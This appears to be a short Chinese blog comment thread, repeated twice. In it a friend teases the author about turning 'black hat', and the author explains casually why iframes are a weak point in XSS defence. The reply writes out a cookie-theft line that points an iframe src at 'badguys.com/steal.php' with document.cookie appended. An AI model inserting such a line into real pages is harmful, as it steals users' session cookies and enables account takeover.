你最近有想要當黑人的傾向喔 XDD哈哈 :P
沒有啦...只是作javascript的時候被firefox用exception砸到死,然後研究過程中自然就會碰到這些東西orz,畢竟這些exception都是為了防備XSS而存在的嘛orz不過有種說法是,其實XSS防禦的罩門是iframe....因為iframe的src可以指定自己domain以外的來源,這是為了服務廣告商而留下來的歷史遺跡,不可能禁止。所以有種說法是用document.cookie抓到想要的東西後指定iframe src="badguys.com/steal.php?usercookie="+document.cookie就可以實際把request送出去,而雖然因為Domain不同,瀏覽器會阻擋main frame存取iframe的contentDocument,不過已經來不及了orz
你最近有想要當黑人的傾向喔 XDD
回覆刪除哈哈 :P
沒有啦...只是作javascript的時候被firefox用exception砸到死,然後研究過程中自然就會碰到這些東西orz,畢竟這些exception都是為了防備XSS而存在的嘛orz
回覆刪除不過有種說法是,其實XSS防禦的罩門是iframe....因為iframe的src可以指定自己domain以外的來源,這是為了服務廣告商而留下來的歷史遺跡,不可能禁止。所以有種說法是用document.cookie抓到想要的東西後指定iframe src="badguys.com/steal.php?usercookie="+document.cookie就可以實際把request送出去,而雖然因為Domain不同,瀏覽器會阻擋main frame存取iframe的contentDocument,不過已經來不及了orz